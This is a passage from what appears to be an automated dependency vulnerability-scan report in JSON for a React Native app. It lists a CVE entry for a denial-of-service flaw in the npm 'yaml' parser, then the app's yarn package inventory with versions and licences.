"https://github.com/uuidjs/uuid/releases/tag/v14.0.0", "https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq" ], "PublishedDate": "2026-04-22T20:53:24Z", "LastModifiedDate": "2026-04-22T20:53:24Z" }, { "VulnerabilityID": "CVE-2026-33532", "VendorIDs": [ "GHSA-48c2-rrv3-qjmp" ], "PkgID": "yaml@2.8.1", "PkgName": "yaml", "PkgIdentifier": { "PURL": "pkg:npm/yaml@2.8.1", "UID": "37f4ea3e7440d092" }, "InstalledVersion": "2.8.1", "FixedVersion": "2.8.3, 1.10.3", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33532", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:92f65e04ccde0fe3a0d60bcb79201e1fe0e19e8beba648986a76d544c99161ca", "Title": "yaml: yaml: Denial of Service via deeply nested YAML document parsing", "Description": "`yaml` is a YAML parser and serialiser for JavaScript. Parsing a YAML document with a version of `yaml` on the 1.x branch prior to 1.10.3 or on the 2.x branch prior to 2.8.3 may throw a RangeError due to a stack overflow. The node resolution/composition phase uses recursive function calls without a depth bound. An attacker who can supply YAML for parsing can trigger a `RangeError: Maximum call stack size exceeded` with a small payload (~2–10 KB). The `RangeError` is not a `YAMLParseError`, so applications that only catch YAML-specific errors will encounter an unexpected exception type. Depending on the host application's exception handling, this can fail requests or terminate the Node.js process. Flow sequences allow deep nesting with minimal bytes (2 bytes per level: one `[` and one `]`). On the default Node.js stack, approximately 1,000–5,000 levels of nesting (2–10 KB input) exhaust the call stack. The exact threshold is environment-dependent (Node.js version, stack size, call stack depth at invocation). Note: the library's `Parser` (CST phase) uses a stack-based iterative approach and is not affected. Only the compose/resolve phase uses actual call-stack recursion. All three public parsing APIs are affected: `YAML.parse()`, `YAML.parseDocument()`, and `YAML.parseAllDocuments()`. Versions 1.10.3 and 2.8.3 contain a patch.", "Severity": "MEDIUM", "CweIDs": [ "CWE-674" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "V3Score": 4.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "V3Score": 6.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-33532", "https://github.com/eemeli/yaml", "https://github.com/eemeli/yaml/commit/1e84ebbea7ec35011a4c61bbb820a529ee4f359b", "https://github.com/eemeli/yaml/releases/tag/v1.10.3", "https://github.com/eemeli/yaml/releases/tag/v2.8.3", "https://github.com/eemeli/yaml/security/advisories/GHSA-48c2-rrv3-qjmp", "https://nvd.nist.gov/vuln/detail/CVE-2026-33532", "https://www.cve.org/CVERecord?id=CVE-2026-33532" ], "PublishedDate": "2026-03-26T20:16:15.543Z", "LastModifiedDate": "2026-04-02T18:11:37.49Z" } ] }, { "Target": "yarn.lock", "Class": "lang-pkgs", "Type": "yarn", "Packages": [ { "ID": "Performics@0.0.1", "Name": "Performics", "Identifier": { "PURL": "pkg:npm/performics@0.0.1", "UID": "125b1b606e077594" }, "Version": "0.0.1", "Relationship": "root", "DependsOn": [ "@babel/core@7.28.4", "@babel/runtime@7.28.4", "@dominicvonk/react-native-apk-installer@2.2.2", "@mapbox/polyline@1.2.1", "@react-native-async-storage/async-storage@1.24.0", "@react-native-clipboard/clipboard@1.16.3", "@react-native-community/checkbox@0.5.20", "@react-native-community/datetimepicker@8.4.5", "@react-native-community/masked-view@0.1.11", "@react-native-community/netinfo@11.4.1", "@react-native-community/slider@5.0.1", "@react-native-firebase/app@23.4.0", "@react-native-firebase/crashlytics@23.4.0", "@react-native-firebase/messaging@23.4.0", "@react-native-picker/picker@2.11.2", "@react-native/new-app-screen@0.81.0", "@react-navigation/drawer@7.5.9", "@react-navigation/material-top-tabs@7.4.22", "@react-navigation/native@7.2.1", "@react-navigation/stack@7.4.9", "axios@1.12.2", "babel-plugin-inline-import@3.0.0", "babel-plugin-module-resolver@5.0.3", "base-64@1.0.0", "deprecated-react-native-prop-types@5.0.0", "install@0.13.0", "mime@4.1.0", "moment@2.30.1", "npm@11.6.2", "react-native-asset@2.1.1", "react-native-audio-recorder-player@3.5.3", "react-native-blob-util@0.22.2", "react-native-bootsplash@6.3.11", "react-native-camera-kit@15.1.0", "react-native-chart-kit@6.12.0", "react-native-collapsible@1.6.2", "react-native-contacts@8.0.10", "react-native-device-info@14.1.1", "react-native-draggable-flatlist@4.0.3", "react-native-exit-app@2.0.0", "react-native-file-viewer@2.1.5", "react-native-fs@2.20.0", "react-native-geocoding@0.5.0", "react-native-geolocation-service@5.3.1", "react-native-gesture-handler@2.28.0", "react-native-get-random-values@1.11.0", "react-native-gif@1.0.3", "react-native-google-maps@1.0.0", "react-native-image-crop-picker@0.41.6", "react-native-image-pan-zoom@2.1.12", "react-native-image-picker@8.2.1", "react-native-image-resizer@1.4.5", "react-native-image-zoom-viewer@3.0.1", "react-native-keyboard-aware-scroll-view@0.9.5", "react-native-keychain@10.0.0", "react-native-linear-gradient@2.8.3", "react-native-localize@3.5.2", "react-native-maps@1.26.14", "react-native-markdown-display@7.0.2", "react-native-mmkv@3.3.3", "react-native-modal-datetime-picker@18.0.0", "react-native-modal-selector@2.1.2", "react-native-modal@14.0.0-rc.1", "react-native-multiple-select@0.5.12", "react-native-orientation-locker@1.7.0", "react-native-otp-inputs@7.4.0", "react-native-pager-view@8.0.0", "react-native-paper@5.14.5", "react-native-permissions@5.4.2", "react-native-photo-manipulator@1.9.2", "react-native-push-notification@8.1.1", "react-native-quick-crypto@0.7.17", "react-native-reanimated-carousel@4.0.3", "react-native-reanimated@4.3.0", "react-native-responsive-screen@1.4.2", "react-native-safe-area-context@5.6.1", "react-native-screens@4.16.0", "react-native-send-intent@1.3.0", "react-native-share@12.2.6", "react-native-snackbar@2.9.0", "react-native-snap-carousel@3.9.1", "react-native-splash-screen@3.3.0", "react-native-sqlite-2@3.6.2", "react-native-svg-transformer@1.5.1", "react-native-svg@15.14.0", "react-native-tab-view@4.3.0", "react-native-tts@4.1.1", "react-native-vector-icons@10.3.0", "react-native-video-controls@2.8.1", "react-native-video@6.17.0", "react-native-view-shot@4.0.3", "react-native-vision-camera-v3-image-labeling@1.5.0", "react-native-vision-camera@4.7.2", "react-native-webview@13.16.0", "react-native-worklets-core@1.6.3", "react-native-worklets@0.8.1", "react-native@0.81.0", "react-redux@9.2.0", "react@19.1.0", "redux@5.0.1" ], "AnalyzedBy": "yarn" }, { "ID": "@dominicvonk/react-native-apk-installer@2.2.2", "Name": "@dominicvonk/react-native-apk-installer", "Identifier": { "PURL": "pkg:npm/%40dominicvonk/react-native-apk-installer@2.2.2", "UID": "bda9ed012421af38" }, "Version": "2.2.2", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 1066, "EndLine": 1069 } ], "AnalyzedBy": "yarn" }, { "ID": "@mapbox/polyline@1.2.1", "Name": "@mapbox/polyline", "Identifier": { "PURL": "pkg:npm/%40mapbox/polyline@1.2.1", "UID": "c2e689f49011c88c" }, "Version": "1.2.1", "Licenses": [ "BSD-3-Clause" ], "Relationship": "direct", "DependsOn": [ "meow@9.0.0" ], "Locations": [ { "StartLine": 1896, "EndLine": 1901 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-native-async-storage/async-storage@1.24.0", "Name": "@react-native-async-storage/async-storage", "Identifier": { "PURL": "pkg:npm/%40react-native-async-storage/async-storage@1.24.0", "UID": "d055713cb08dc8e1" }, "Version": "1.24.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "merge-options@3.0.4" ], "Locations": [ { "StartLine": 2154, "EndLine": 2159 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-native-clipboard/clipboard@1.16.3", "Name": "@react-native-clipboard/clipboard", "Identifier": { "PURL": "pkg:npm/%40react-native-clipboard/clipboard@1.16.3", "UID": "882831bb7b4690cf" }, "Version": "1.16.3", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 2161, "EndLine": 2164 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-native-community/checkbox@0.5.20", "Name": "@react-native-community/checkbox", "Identifier": { "PURL": "pkg:npm/%40react-native-community/checkbox@0.5.20", "UID": "fa587a8c2fb6cd21" }, "Version": "0.5.20", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 2166, "EndLine": 2169 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-native-community/datetimepicker@8.4.5", "Name": "@react-native-community/datetimepicker", "Identifier": { "PURL": "pkg:npm/%40react-native-community/datetimepicker@8.4.5", "UID": "ccda55d8970f0fb5" }, "Version": "8.4.5", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "invariant@2.2.4" ], "Locations": [ { "StartLine": 2359, "EndLine": 2364 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-native-community/masked-view@0.1.11", "Name": "@react-native-community/masked-view", "Identifier": { "PURL": "pkg:npm/%40react-native-community/masked-view@0.1.11", "UID": "d952686535c42a63" }, "Version": "0.1.11", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 2366, "EndLine": 2369 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-native-community/netinfo@11.4.1", "Name": "@react-native-community/netinfo", "Identifier": { "PURL": "pkg:npm/%40react-native-community/netinfo@11.4.1", "UID": "9bb130c16484b6ba" }, "Version": "11.4.1", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 2371, "EndLine": 2374 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-native-community/slider@5.0.1", "Name": "@react-native-community/slider", "Identifier": { "PURL": "pkg:npm/%40react-native-community/slider@5.0.1", "UID": "568fc74d152b4f0" }, "Version": "5.0.1", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 2383, "EndLine": 2386 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-native-firebase/app@23.4.0", "Name": "@react-native-firebase/app", "Identifier": { "PURL": "pkg:npm/%40react-native-firebase/app@23.4.0", "UID": "fe42eb733eeb4e6c" }, "Version": "23.4.0", "Licenses": [ "Apache-2.0" ], "Relationship": "direct", "DependsOn": [ "firebase@12.2.1" ], "Locations": [ { "StartLine": 2388, "EndLine": 2393 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-native-firebase/crashlytics@23.4.0", "Name": "@react-native-firebase/crashlytics", "Identifier": { "PURL": "pkg:npm/%40react-native-firebase/crashlytics@23.4.0", "UID": "234246fadd99a840" }, "Version": "23.4.0", "Licenses": [ "Apache-2.0" ], "Relationship": "direct", "DependsOn": [ "stacktrace-js@2.0.2" ], "Locations": [ { "StartLine": 2395, "EndLine": 2400 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-native-firebase/messaging@23.4.0", "Name": "@react-native-firebase/messaging", "Identifier": { "PURL": "pkg:npm/%40react-native-firebase/messaging@23.4.0", "UID": "fac204599cdecae3" }, "Version": "23.4.0", "Licenses": [ "Apache-2.0" ], "Relationship": "direct", "Locations": [ { "StartLine": 2402, "EndLine": 2405 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-native-picker/picker@2.11.2", "Name": "@react-native-picker/picker", "Identifier": { "PURL": "pkg:npm/%40react-native-picker/picker@2.11.2", "UID": "e0e7e528da86d640" }, "Version": "2.11.2", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 2407, "EndLine": 2410 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-native/new-app-screen@0.81.0", "Name": "@react-native/new-app-screen", "Identifier": { "PURL": "pkg:npm/%40react-native/new-app-screen@0.81.0", "UID": "af722b3bcad6e802" }, "Version": "0.81.0", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 2575, "EndLine": 2578 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-navigation/drawer@7.5.9", "Name": "@react-navigation/drawer", "Identifier": { "PURL": "pkg:npm/%40react-navigation/drawer@7.5.9", "UID": "c23215343d3f695f" }, "Version": "7.5.9", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@react-navigation/elements@2.9.13", "color@4.2.3", "react-native-drawer-layout@4.1.13", "use-latest-callback@0.2.5" ], "Locations": [ { "StartLine": 2617, "EndLine": 2625 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-navigation/material-top-tabs@7.4.22", "Name": "@react-navigation/material-top-tabs", "Identifier": { "PURL": "pkg:npm/%40react-navigation/material-top-tabs@7.4.22", "UID": "22c61ecc303eb073" }, "Version": "7.4.22", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@react-navigation/elements@2.9.13", "color@4.2.3", "react-native-tab-view@4.3.0" ], "Locations": [ { "StartLine": 2636, "EndLine": 2643 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-navigation/native@7.2.1", "Name": "@react-navigation/native", "Identifier": { "PURL": "pkg:npm/%40react-navigation/native@7.2.1", "UID": "1f697d936122757" }, "Version": "7.2.1", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@react-navigation/core@7.17.1", "escape-string-regexp@4.0.0", "fast-deep-equal@3.1.3", "nanoid@3.3.11", "use-latest-callback@0.2.5" ], "Locations": [ { "StartLine": 2645, "EndLine": 2654 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-navigation/stack@7.4.9", "Name": "@react-navigation/stack", "Identifier": { "PURL": "pkg:npm/%40react-navigation/stack@7.4.9", "UID": "7f7b4fc3ebd1f8" }, "Version": "7.4.9", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@react-navigation/elements@2.9.13", "color@4.2.3" ], "Locations": [ { "StartLine": 2663, "EndLine": 2669 } ], "AnalyzedBy": "yarn" }, { "ID": "axios@1.12.2", "Name": "axios", "Identifier": { "PURL": "pkg:npm/axios@1.12.2", "UID": "cc6941597751af1b" }, "Version": "1.12.2", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "follow-redirects@1.15.11", "form-data@4.0.4", "proxy-from-env@1.1.0" ], "Locations": [ { "StartLine": 3499, "EndLine": 3506 } ], "AnalyzedBy": "yarn" }, { "ID": "babel-plugin-inline-import@3.0.0", "Name": "babel-plugin-inline-import", "Identifier": { "PURL": "pkg:npm/babel-plugin-inline-import@3.0.0", "UID": "b82ef7d3ef5025da" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "require-resolve@0.0.2" ], "Locations": [ { "StartLine": 3526, "EndLine": 3531 } ], "AnalyzedBy": "yarn" }, { "ID": "babel-plugin-module-resolver@5.0.3", "Name": "babel-plugin-module-resolver", "Identifier": { "PURL": "pkg:npm/babel-plugin-module-resolver@5.0.3", "UID": "55c9c5e33b3ef279" }, "Version": "5.0.3", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "find-babel-config@2.1.2", "glob@9.3.5", "pkg-up@3.1.0", "reselect@4.1.8", "resolve@1.22.10" ], "Locations": [ { "StartLine": 3554, "EndLine": 3563 } ], "AnalyzedBy": "yarn" }, { "ID": "base-64@1.0.0", "Name": "base-64", "Identifier": { "PURL": "pkg:npm/base-64@1.0.0", "UID": "fc5af91f0bf45867" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 3684, "EndLine": 3687 } ], "AnalyzedBy": "yarn" }, { "ID": "deprecated-react-native-prop-types@5.0.0", "Name": "deprecated-react-native-prop-types", "Identifier": { "PURL": "pkg:npm/deprecated-react-native-prop-types@5.0.0", "UID": "d667fe20844277bd" }, "Version": "5.0.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@react-native/normalize-colors@0.73.2", "invariant@2.2.4", "prop-types@15.8.1" ], "Locations": [ { "StartLine": 4582, "EndLine": 4589 } ], "AnalyzedBy": "yarn" }, { "ID": "install@0.13.0", "Name": "install", "Identifier": { "PURL": "pkg:npm/install@0.13.0", "UID": "5588a39cf931a9f6" }, "Version": "0.13.0", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 6077, "EndLine": 6080 } ], "AnalyzedBy": "yarn" }, { "ID": "mime@4.1.0", "Name": "mime", "Identifier": { "PURL": "pkg:npm/mime@4.1.0", "UID": "e3d9092eb25c0940" }, "Version": "4.1.0", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 7645, "EndLine": 7648 } ], "AnalyzedBy": "yarn" }, { "ID": "moment@2.30.1", "Name": "moment", "Identifier": { "PURL": "pkg:npm/moment@2.30.1", "UID": "fdd42698ed1981d4" }, "Version": "2.30.1", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 7859, "EndLine": 7862 } ], "AnalyzedBy": "yarn" }, { "ID": "npm@11.6.2", "Name": "npm", "Identifier": { "PURL": "pkg:npm/npm@11.6.2", "UID": "bff273ceed34d4b4" }, "Version": "11.6.2", "Licenses": [ "Artistic-2.0" ], "Relationship": "direct", "DependsOn": [ "@isaacs/string-locale-compare@1.1.0", "@npmcli/arborist@9.1.6", "@npmcli/config@10.4.2", "@npmcli/fs@4.0.0", "@npmcli/map-workspaces@5.0.0", "@npmcli/package-json@7.0.1", "@npmcli/promise-spawn@8.0.3", "@npmcli/redact@3.2.2", "@npmcli/run-script@10.0.0", "@sigstore/tuf@4.0.0", "abbrev@3.0.1", "archy@1.0.0", "cacache@20.0.1", "chalk@5.6.2", "ci-info@4.3.1", "cli-columns@4.0.0", "fastest-levenshtein@1.0.16", "fs-minipass@3.0.3", "glob@11.0.3", "graceful-fs@4.2.11", "hosted-git-info@9.0.2", "ini@5.0.0", "init-package-json@8.2.2", "is-cidr@6.0.1", "json-parse-even-better-errors@4.0.0", "libnpmaccess@10.0.3", "libnpmdiff@8.0.9", "libnpmexec@10.1.8", "libnpmfund@7.0.9", "libnpmorg@8.0.1", "libnpmpack@9.0.9", "libnpmpublish@11.1.2", "libnpmsearch@9.0.1", "libnpmteam@8.0.2", "libnpmversion@8.0.2", "make-fetch-happen@15.0.2", "minimatch@10.0.3", "minipass@7.1.2", "minipass-pipeline@1.2.4", "ms@2.1.3", "node-gyp@11.4.2", "nopt@8.1.0", "npm-audit-report@6.0.0", "npm-install-checks@7.1.2", "npm-package-arg@13.0.1", "npm-pick-manifest@11.0.1", "npm-profile@12.0.0", "npm-registry-fetch@19.0.0", "npm-user-validate@3.0.0", "p-map@7.0.3", "pacote@21.0.3", "parse-conflict-json@4.0.0", "proc-log@5.0.0", "qrcode-terminal@0.12.0", "read@4.1.0", "semver@7.7.4", "spdx-expression-parse@4.0.0", "ssri@12.0.0", "supports-color@10.2.2", "tar@7.5.1", "text-table@0.2.0", "tiny-relative-date@2.0.2", "treeverse@3.0.0", "validate-npm-package-name@6.0.2", "which@5.0.0" ], "Locations": [ { "StartLine": 8106, "EndLine": 8175 } ], "AnalyzedBy": "yarn" }, { "ID": "react@19.1.0", "Name": "react", "Identifier": { "PURL": "pkg:npm/react@19.1.0", "UID": "6b14c1d0e9c6671e" }, "Version": "19.1.0", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 9449, "EndLine": 9452 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native@0.81.0", "Name": "react-native", "Identifier": { "PURL": "pkg:npm/react-native@0.81.0", "UID": "32d59a5b6a71bb6a" }, "Version": "0.81.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@jest/create-cache-key-function@29.7.0", "@react-native/assets-registry@0.81.0", "@react-native/codegen@0.81.0", "@react-native/community-cli-plugin@0.81.0", "@react-native/gradle-plugin@0.81.0", "@react-native/js-polyfills@0.81.0", "@react-native/normalize-colors@0.81.0", "@react-native/virtualized-lists@0.81.0", "abort-controller@3.0.0", "anser@1.4.10", "ansi-regex@5.0.1", "babel-jest@29.7.0", "babel-plugin-syntax-hermes-parser@0.29.1", "base64-js@1.5.1", "commander@12.1.0", "flow-enums-runtime@0.0.6", "glob@7.2.3", "invariant@2.2.4", "jest-environment-node@29.7.0", "memoize-one@5.2.1", "metro-runtime@0.83.3", "metro-source-map@0.83.3", "nullthrows@1.1.1", "pretty-format@29.7.0", "promise@8.3.0", "react-devtools-core@6.1.5", "react-refresh@0.14.2", "regenerator-runtime@0.13.11", "scheduler@0.26.0", "semver@7.7.3", "stacktrace-parser@0.1.11", "whatwg-fetch@3.6.20", "ws@6.2.3", "yargs@17.7.2" ], "Locations": [ { "StartLine": 9388, "EndLine": 9426 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-asset@2.1.1", "Name": "react-native-asset", "Identifier": { "PURL": "pkg:npm/react-native-asset@2.1.1", "UID": "b77a6f5b9ab7a037" }, "Version": "2.1.1", "Licenses": [ "ISC" ], "Relationship": "direct", "DependsOn": [ "fs-extra@7.0.1", "lodash@4.17.21", "npmlog@4.1.2", "plist@3.1.0", "sha1-file@1.0.4", "xcode@2.1.0" ], "Locations": [ { "StartLine": 8900, "EndLine": 8910 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-audio-recorder-player@3.5.3", "Name": "react-native-audio-recorder-player", "Identifier": { "PURL": "pkg:npm/react-native-audio-recorder-player@3.5.3", "UID": "49a4790aaaea8383" }, "Version": "3.5.3", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "dooboolab-welcome@1.3.2", "react-native-audio-recorder-player@3.5.3" ], "Locations": [ { "StartLine": 8912, "EndLine": 8918 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-blob-util@0.22.2", "Name": "react-native-blob-util", "Identifier": { "PURL": "pkg:npm/react-native-blob-util@0.22.2", "UID": "6c3135e74e12d54e" }, "Version": "0.22.2", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "base-64@0.1.0", "glob@10.4.5" ], "Locations": [ { "StartLine": 8920, "EndLine": 8926 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-bootsplash@6.3.11", "Name": "react-native-bootsplash", "Identifier": { "PURL": "pkg:npm/react-native-bootsplash@6.3.11", "UID": "f3b3a550f9bb804" }, "Version": "6.3.11", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@expo/config-plugins@10.1.2", "@react-native-community/cli-config-android@18.0.0", "@react-native-community/cli-config-apple@18.0.0", "@react-native-community/cli-tools@18.0.0", "commander@13.1.0", "detect-indent@6.1.0", "fs-extra@11.3.2", "node-html-parser@7.0.1", "picocolors@1.1.1", "prettier@3.6.2", "react-native-is-edge-to-edge@1.3.1", "sharp@0.32.6", "ts-dedent@2.2.0", "xml-formatter@3.6.7" ], "Locations": [ { "StartLine": 8928, "EndLine": 8946 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-camera-kit@15.1.0", "Name": "react-native-camera-kit", "Identifier": { "PURL": "pkg:npm/react-native-camera-kit@15.1.0", "UID": "d23409167892580d" }, "Version": "15.1.0", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 8948, "EndLine": 8951 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-chart-kit@6.12.0", "Name": "react-native-chart-kit", "Identifier": { "PURL": "pkg:npm/react-native-chart-kit@6.12.0", "UID": "b60fa4e66db0a209" }, "Version": "6.12.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "lodash@4.17.21", "paths-js@0.4.11", "point-in-polygon@1.1.0" ], "Locations": [ { "StartLine": 8953, "EndLine": 8960 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-collapsible@1.6.2", "Name": "react-native-collapsible", "Identifier": { "PURL": "pkg:npm/react-native-collapsible@1.6.2", "UID": "5faf0fa4462438d9" }, "Version": "1.6.2", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 8962, "EndLine": 8965 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-contacts@8.0.10", "Name": "react-native-contacts", "Identifier": { "PURL": "pkg:npm/react-native-contacts@8.0.10", "UID": "389a30acdf88d126" }, "Version": "8.0.10", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 8967, "EndLine": 8970 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-device-info@14.1.1", "Name": "react-native-device-info", "Identifier": { "PURL": "pkg:npm/react-native-device-info@14.1.1", "UID": "bc077344957ea5d9" }, "Version": "14.1.1", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 8972, "EndLine": 8975 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-draggable-flatlist@4.0.3", "Name": "react-native-draggable-flatlist", "Identifier": { "PURL": "pkg:npm/react-native-draggable-flatlist@4.0.3", "UID": "81f3d35add2a9fde" }, "Version": "4.0.3", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@babel/preset-typescript@7.27.1" ], "Locations": [ { "StartLine": 8977, "EndLine": 8982 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-exit-app@2.0.0", "Name": "react-native-exit-app", "Identifier": { "PURL": "pkg:npm/react-native-exit-app@2.0.0", "UID": "c8bb75c5a64e8dc" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 8991, "EndLine": 8994 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-file-viewer@2.1.5", "Name": "react-native-file-viewer", "Identifier": { "PURL": "pkg:npm/react-native-file-viewer@2.1.5", "UID": "250dbb58ce6f0521" }, "Version": "2.1.5", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 8996, "EndLine": 8999 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-fs@2.20.0", "Name": "react-native-fs", "Identifier": { "PURL": "pkg:npm/react-native-fs@2.20.0", "UID": "666dca1f39ebb11a" }, "Version": "2.20.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "base-64@0.1.0", "utf8@3.0.0" ], "Locations": [ { "StartLine": 9008, "EndLine": 9014 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-geocoding@0.5.0", "Name": "react-native-geocoding", "Identifier": { "PURL": "pkg:npm/react-native-geocoding@0.5.0", "UID": "2c1903ff44312484" }, "Version": "0.5.0", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 9016, "EndLine": 9019 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-geolocation-service@5.3.1", "Name": "react-native-geolocation-service", "Identifier": { "PURL": "pkg:npm/react-native-geolocation-service@5.3.1", "UID": "9e4ae399cad21d97" }, "Version": "5.3.1", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 9021, "EndLine": 9024 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-gesture-handler@2.28.0", "Name": "react-native-gesture-handler", "Identifier": { "PURL": "pkg:npm/react-native-gesture-handler@2.28.0", "UID": "2330c33dd477aa9c" }, "Version": "2.28.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@egjs/hammerjs@2.0.17", "hoist-non-react-statics@3.3.2", "invariant@2.2.4" ], "Locations": [ { "StartLine": 9026, "EndLine": 9033 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-get-random-values@1.11.0", "Name": "react-native-get-random-values", "Identifier": { "PURL": "pkg:npm/react-native-get-random-values@1.11.0", "UID": "337af0db9c720463" }, "Version": "1.11.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "fast-base64-decode@1.0.0" ], "Locations": [ { "StartLine": 9035, "EndLine": 9040 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-gif@1.0.3", "Name": "react-native-gif", "Identifier": { "PURL": "pkg:npm/react-native-gif@1.0.3", "UID": "3cdb0f9a5ca0c0a8" }, "Version": "1.0.3", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 9042, "EndLine": 9045 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-google-maps@1.0.0", "Name": "react-native-google-maps", "Identifier": { "PURL": "pkg:npm/react-native-google-maps@1.0.0", "UID": "4a5ff2d9b2275251" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 9047, "EndLine": 9050 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-image-crop-picker@0.41.6", "Name": "react-native-image-crop-picker", "Identifier": { "PURL": "pkg:npm/react-native-image-crop-picker@0.41.6", "UID": "4bda081040ef9d1e" }, "Version": "0.41.6", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 9052, "EndLine": 9055 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-image-pan-zoom@2.1.12", "Name": "react-native-image-pan-zoom", "Identifier": { "PURL": "pkg:npm/react-native-image-pan-zoom@2.1.12", "UID": "785f8be9db5dfcdf" }, "Version": "2.1.12", "Licenses": [ "ISC" ], "Relationship": "direct", "Locations": [ { "StartLine": 9057, "EndLine": 9060 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-image-picker@8.2.1", "Name": "react-native-image-picker", "Identifier": { "PURL": "pkg:npm/react-native-image-picker@8.2.1", "UID": "6c4521b28dea70b3" }, "Version": "8.2.1", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 9062, "EndLine": 9065 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-image-resizer@1.4.5", "Name": "react-native-image-resizer", "Identifier": { "PURL": 